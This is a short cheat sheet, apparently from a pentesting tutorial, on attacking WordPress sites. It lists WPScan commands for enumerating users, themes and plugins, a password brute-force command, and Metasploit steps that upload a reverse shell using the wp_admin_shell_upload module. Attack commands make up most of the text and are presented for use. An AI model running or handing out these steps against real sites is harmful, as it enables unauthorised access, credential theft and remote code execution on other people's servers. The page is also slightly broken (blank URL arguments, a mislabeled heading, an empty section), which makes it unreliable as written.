Attacking Wordpress
Attacking Wordpress

WPSScan: How to Attack WordPress Website

Learn how to execute the most commons WordPress attacks from username enumeration to upaload a reverse shell into the target b0x.

Install WPscan

apt install wpscan -y

WPscan Parameters

wpscan -h

Update WPscan

wpscan --update

Enumerate WordPress using WPscan


All Themes Installed

wpscan --url -e t

Vulnerable Themes Installed

wpscan --url -e vt

All Plugins Installed

wpscan --url -e p

Vulnerable Themes Installed

wpscan --url -e vp

WordPress Users

wpscan --url -e u

Brute Force WordPress Passwords

wpscan --url --passwords path-to-wordlist

Help with Metasploit

Upload Reverse Shell to WordPress

Upload Manually


Upload using Metasploit

msf > use exploit/unix/webapp/wp_admin_shell_upload
msf exploit(wp_admin_shell_upload) > set USERNAME admin
msf exploit(wp_admin_shell_upload) > set PASSWORD admin
msf exploit(wp_admin_shell_upload) > set targeturi /wordpress
msf exploit(wp_admin_shell_upload) > exploit